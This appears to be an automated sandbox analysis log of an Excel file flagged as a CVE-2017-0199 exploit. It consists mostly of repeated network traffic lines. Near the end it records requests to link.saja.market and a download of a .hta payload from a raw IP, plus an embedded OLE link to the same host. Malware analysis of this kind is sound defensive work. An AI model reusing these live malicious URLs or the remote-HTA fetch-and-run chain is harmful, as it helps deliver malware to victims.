Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 3.39.89.152 3.39.89.152
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /l33LNEfFvd?&candidate=blushing&august=royal&manx HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: link.saja.marketConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /880/eswa/verysurethingsonherewithgreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.191.88
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /l33LNEfFvd?&candidate=blushing&august=royal&manx HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: link.saja.marketConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /880/eswa/verysurethingsonherewithgreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.191.88
Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: 197.87.175.4.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: link.saja.market
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx, CC850000.0.drString found in binary or memory: https://link.saja.market/l33LNEfFvd?&candidate=blushing&august=royal&manxW
Source: Primary1741785087300888100_B54C726B-7536-4F20-8418-90CE65C7F04D.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: Primary1741785087300888100_B54C726B-7536-4F20-8418-90CE65C7F04D.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/37327920121
Source: Primary1741785087300888100_B54C726B-7536-4F20-8418-90CE65C7F04D.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/41402421625
Source: Primary1741785087300888100_B54C726B-7536-4F20-8418-90CE65C7F04D.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/43296341670
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63582
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63570
Source: unknownNetwork traffic detected: HTTP traffic on port 63570 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63576 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63575 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63575
Source: unknownNetwork traffic detected: HTTP traffic on port 63582 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63576
Source: unknownHTTPS traffic detected: 2.22.242.113:443 -> 192.168.2.24:63582 version: TLS 1.2

System Summary

barindex
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxOLE: Microsoft Excel 2007+
Source: ~DFBCA3F597EEDC166E.TMP.0.drOLE: Microsoft Excel 2007+
Source: CC850000.0.drOLE: Microsoft Excel 2007+
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxOLE indicator, VBA macros: true
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxStream path 'MBD00420639/\x1Ole' : https://link.saja.market/l33LNEfFvd?&candidate=blushing&august=royal&manxWK8;FJtx&uZ|f2"bE5,X|mG\GWF|pSv5XJ:k\0T2<r>/BX7Kn-=b}l/-ixXkJrq4rF$_\rdWm5<KkI$uGjQE5"OP.}.o#+CN7pT5arTpeIaEGjyTM5OmqzAtSwP7Kwncs3NxnE1r9FnzcB0ZzIoxJNnL4si9srrBa28Y7mVHKh3TGdkaW2s9KYZrQQvBzgSe53qvJFth5Bu5usXxsl7tmmxzf&34-)C%^>7sTn;
Source: CC850000.0.drStream path 'MBD00420639/\x1Ole' : https://link.saja.market/l33LNEfFvd?&candidate=blushing&august=royal&manxWK8;FJtx&uZ|f2"bE5,X|mG\GWF|pSv5XJ:k\0T2<r>/BX7Kn-=b}l/-ixXkJrq4rF$_\rdWm5<KkI$uGjQE5"OP.}.o#+CN7pT5arTpeIaEGjyTM5OmqzAtSwP7Kwncs3NxnE1r9FnzcB0ZzIoxJNnL4si9srrBa28Y7mVHKh3TGdkaW2s9KYZrQQvBzgSe53qvJFth5Bu5usXxsl7tmmxzf&34-)C%^>7sTn;
